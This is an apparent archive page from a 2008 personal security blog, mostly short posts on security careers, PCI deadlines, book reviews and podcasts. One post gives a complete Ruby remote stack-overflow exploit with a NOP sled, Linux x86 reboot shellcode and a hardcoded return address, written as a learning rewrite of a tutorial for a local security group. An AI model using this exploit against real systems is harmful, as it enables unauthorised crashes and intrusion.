February 29th, 2008 Anthony Towry
For me, reading blog comments on popular sites is usually somewhat of an exercise in self hate. More often than not it's a drive through the unhelpful. I do love it though when I come across a gem that's truly informative.
I recently had such an experience reading the comments to a SecurityFocus article on the skills required by most individuals to enter the information security field. This article describes the route I've heard the most about. One that involves experience in admin duties or networking.
Grant Bugher of the Perimeter Grid blog had a post covering another route to the information security field. The route he describes and has personally taken pulls heavily from experience in development and writing secure code. This route is crazy interesting to me and I'm glad to see I'm naturally heading down the road he's talking about.
It's really a great post that gives hope to the coder who wants to break into the field. If you're into development and information security check it out. That said, the job boards don't lie and the state of things today do not appear to favor this path.
Posted in Programming, Security, Web development | No Comments »
February 27th, 2008 Anthony Towry
Recently the idea hit me to look into what it would take to locate personal account numbers (PAN)s that had been unknowingly filed away by applications or server logs. I quickly found three open source tools to enlist.
Listen to find out which one I liked and which ones are fit for /dev/null. Enjoy the show!
Finding PANs With Open Source Tools [24:58m]:
Play Now |
Play in Popup |
Download (59)
Posted in Podcast | No Comments »
February 26th, 2008 Anthony Towry
Insider threat is an area of security with crazy potential to turn things over on an organization in a big way. These attackers are trusted, knowledgeable and quite often fully authorized by the systems in place to perform whatever dirty deed they've got in mind.
Most people would rather not think of their coworkers as potential criminals even when confronted with studies, news stories and statistics that focus the light on just how relevant these threats are. This book should help.
Brian makes use of multiple dynamic case studies and experience that keeps the reader engaged in almost cinematic suspense. He presents information on the type of person behind the attacks and shows off the kind of correlation that an Enterprise Security Management (ESM) system should perform.
I really enjoyed this book
, it takes the hard job of explaining what can be done when you can't prevent, you can only detect and respond.
Posted in Security | No Comments »
February 26th, 2008 Anthony Towry
Microsoft is releasing documentation to the public regarding quite a few of the protocols that are implemented by their leading products.
This sounds like an excellent time for someone to start working on some fuzzing tools.
Posted in Programming | No Comments »
February 13th, 2008 Anthony Towry
This Friday we are getting back into the trenches at the DC405. We have a talk coming up on remote exploitation of stack-based overflows that will be presented by ri0t.
So, I've been checking out the write-up by Preddy regarding the service. It's a nice walk-through on exploiting an example vulnerable service using both C and Perl. This is informative, I had to adjust my payload size (no biggie) and do a #include <string.h>, but overall a solid example without errors.
Exploits written in C are fairly common. Exploits written in Perl aren't rare. Exploits written using Ruby are like unicorns...they probably exist, but you never see one (at least where I'm keeping up with them). At any rate, I decided to look into rewriting the example exploit into Ruby and scratching the surface concerning Ruby sockets. It turns out that this is an extremely simple thing to do.
#!/usr/bin/ruby
# http://www.calculateddecision.com
require 'socket'
port = 7500
victim=ARGV[0]
nop = "\x90"
sled=nop*240
#This will probably be different for you
eip = "\xa8\xf9\xff\xbf"
#20 byte reboot shellcode Linux x86 Thanks to izik <izik@tty64.org>
shellcode="\x6a\x58"+
"\x58"+
"\xbb\xad\xde\xe1\xfe"+
"\xb9\x69\x19\x12\x28"+
"\xba\x67\x45\x23\x01"+
"\xcd\x80"
payload=sled<<shellcode<<eip
if (ARGV.length<1)#Brief usage
puts "You have to give me a target"
else
mysocket=TCPSocket::new(victim,port)
mysocket.send(payload,0)
mysocket::close
end
As you can see, the TCPSocket constructor only requires an endpoint and a port. What's nice is that you can actually throw a domain name and it will resolve it. I half wondered if the hex bytes would need to be encoded or anything, but this is also handled for us without issue.
Looking at Preddy's perl example, these two forms don't really differ all that much and in fact, I'm not entirely sure that there isn't a simpler socket constructor available in perl (if nothing else CPAN). Even so, Ruby does IMHO offer a more inviting grammar.
You can download my send_overflow.rb here.
Notes:
xWinGs wrote a local ENV variable example
Posted in Programming, Security | 2 Comments »
February 10th, 2008 Anthony Towry
The deadline for the PCI Data Security Standard requirement for securing web applications against known attacks is effective June 30, 2008, currently the recommendations are only "best practice". Which leaves just over four months to address your organization's card holder environment web application security needs. Read the rest of this entry »
Posted in Programming, Security | No Comments »
February 8th, 2008 Anthony Towry
I recently finished flipping through Podcasting Hacks. I say flipping, because I read it in a completely hit-and-run way, digging into the hacks that screamed out.
The book isn't bad, but is definitely geared toward the podcasting newbie. The depth at which format styles and interviewing is covered should be sufficient for any newcomer to produce interesting content.
I would have personally liked to have seen a bit more on some of the technical audio mixing and post production stuff, but who are we kidding? Like my podcast is ever going to be more than a Fisher-Price microphone and a kazoo.
Posted in Books, Podcast | No Comments »
February 6th, 2008 Anthony Towry
In this episode of The Decision, I cover some of the issues that people run into as they start experimenting and exploring stack-based buffer overflows on Linux. Stack smashing is an interesting and rewarding exercise for security enthusiasts. It perfectly illustrates the idea of what can go wrong when trusting user input.
Hopefully with a handful of tips on the "gotchas" we can make it a bit less frustrating at the start. Read the rest of this entry »
Issues With Stack Smashing [36:03m]:
Play Now |
Play in Popup |
Download (157)
Posted in Podcast | No Comments »
